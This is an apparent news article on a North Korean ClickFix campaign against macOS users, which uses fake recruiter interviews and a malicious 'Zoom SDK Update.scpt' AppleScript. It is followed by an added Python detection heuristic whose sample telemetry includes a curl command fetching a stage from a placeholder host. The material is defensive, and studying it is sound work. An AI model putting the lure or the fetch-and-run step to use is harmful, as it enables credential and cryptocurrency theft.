North Korean threat actors are using a ClickFix variant to target macOS users and steal their most valuable data.
Microsoft Threat Intelligence today published research uncovering a macOS-focused cyber campaign attributed to a North Korean threat actor tracked as Sapphire Sleet. Like many campaigns attributed to North Korea, attacks rely on social engineering and, more specifically, ClickFix-style techniques.
ClickFix is a social engineering tactic that grew prominent over the past year. It most often works by inviting a target to an attacker-hosted website or virtual meeting (like Zoom or Teams), but then the target is informed there are technical issues that must be addressed — installing a file or running a shell command. Except that there are no technical issues, and the user is tricked into connecting to attacker infrastructure or installing a malicious binary.
Sherrod DeGrippo, general manager of Global Threat Intelligence at Microsoft, tells Dark Reading that ClickFix is so effective because users are conditioned to accept remote support interactions like clicking prompts, downloading tools, and following instructions. "Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise," she says.
While many threat actors around the world have utilized ClickFix by now, it has become a favorite of North Korean actors like Sapphire Sleet. The nation-state group is believed to overlap with threats tracked as UNC1069, APT38, and Stardust Chollima. Sapphire Sleet is focused primarily on financially supporting the North Korean government through cryptocurrency and intellectual property theft.
"In this campaign, Sapphire Sleet takes advantage of user‑initiated execution to establish persistence, harvest credentials, and exfiltrate sensitive data while operating outside traditional macOS security enforcement boundaries," Microsoft's blog post reads.
How This macOS ClickFix Attack Works
For the described activity, researchers said Sapphire Sleet would create fake recruiter profiles on social media and professional networking platforms, directly engage targets under the pretense of job opportunities, and then schedule a technical interview.
The "interviewer" then directs the target to install a Zoom SDK update that is named "Zoom SDK Update.scpt." This is a compiled AppleScript file that opens in macOS Script Editor by default. The user is then instructed to click the "Run the Script" button.
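A defender-side way to act on the chain described above, added here as an example and not taken from Microsoft's or Dark Reading's write-up: a heuristic over constructed process-execution records that flags an AppleScript host (Script Editor or osascript) opening a .scpt from a download location and then spawning a shell or curl. It assumes the script uses AppleScript's `do shell script`, which runs /bin/sh as a child of the host process; the event schema is simplified and invented for the example.

```python
"""Heuristic detection of ClickFix-style .scpt execution on macOS.
Added example; the Event schema is constructed, not any real EDR format."""
from dataclasses import dataclass, field

SCRIPT_HOSTS = {"Script Editor", "osascript"}        # AppleScript runners
DROP_DIRS = ("/Downloads/", "/Desktop/", "/tmp/")     # where lures usually land
SHELL_TOOLS = {"sh", "bash", "zsh", "curl"}           # typical follow-on children


@dataclass
class Event:
    pid: int
    ppid: int
    exe: str                      # process basename
    args: list = field(default_factory=list)
    user: str = ""


def scpt_from_drop_dir(ev: Event) -> bool:
    """True if an AppleScript host was launched on a .scpt in a drop directory."""
    if ev.exe not in SCRIPT_HOSTS:
        return False
    return any(a.lower().endswith(".scpt") and any(d in a for d in DROP_DIRS)
               for a in ev.args)


def detect(events: list) -> list:
    """Return alert strings for two chained signals:
    (1) Script Editor/osascript opening a .scpt from Downloads/Desktop/tmp;
    (2) that same host process then spawning a shell or curl, which is the
    user-initiated execution step the campaign relies on."""
    by_pid = {e.pid: e for e in events}
    flagged, alerts = set(), []
    for ev in events:
        if scpt_from_drop_dir(ev):
            flagged.add(ev.pid)
            alerts.append(f"{ev.user}: {ev.exe} opened {ev.args[-1]} (pid {ev.pid})")
    for ev in events:
        if ev.exe in SHELL_TOOLS and ev.ppid in flagged:
            parent = by_pid[ev.ppid]
            alerts.append(f"{ev.user}: {parent.exe} (pid {ev.ppid}) spawned "
                          f"{ev.exe} {' '.join(ev.args)}")
    return alerts


# Constructed telemetry: one benign Script Editor use, one ClickFix-like chain.
# example.invalid is a reserved placeholder, not a real attacker host.
SAMPLE = [
    Event(100, 1, "Script Editor", ["/Users/dev/Projects/backup.scpt"], "dev"),
    Event(200, 1, "Script Editor", ["/Users/jane/Downloads/Zoom SDK Update.scpt"], "jane"),
    Event(201, 200, "sh", ["-c", "curl -fsSL https://example.invalid/stage"], "jane"),
]

if __name__ == "__main__":
    for line in detect(SAMPLE):
        print("ALERT", line)
```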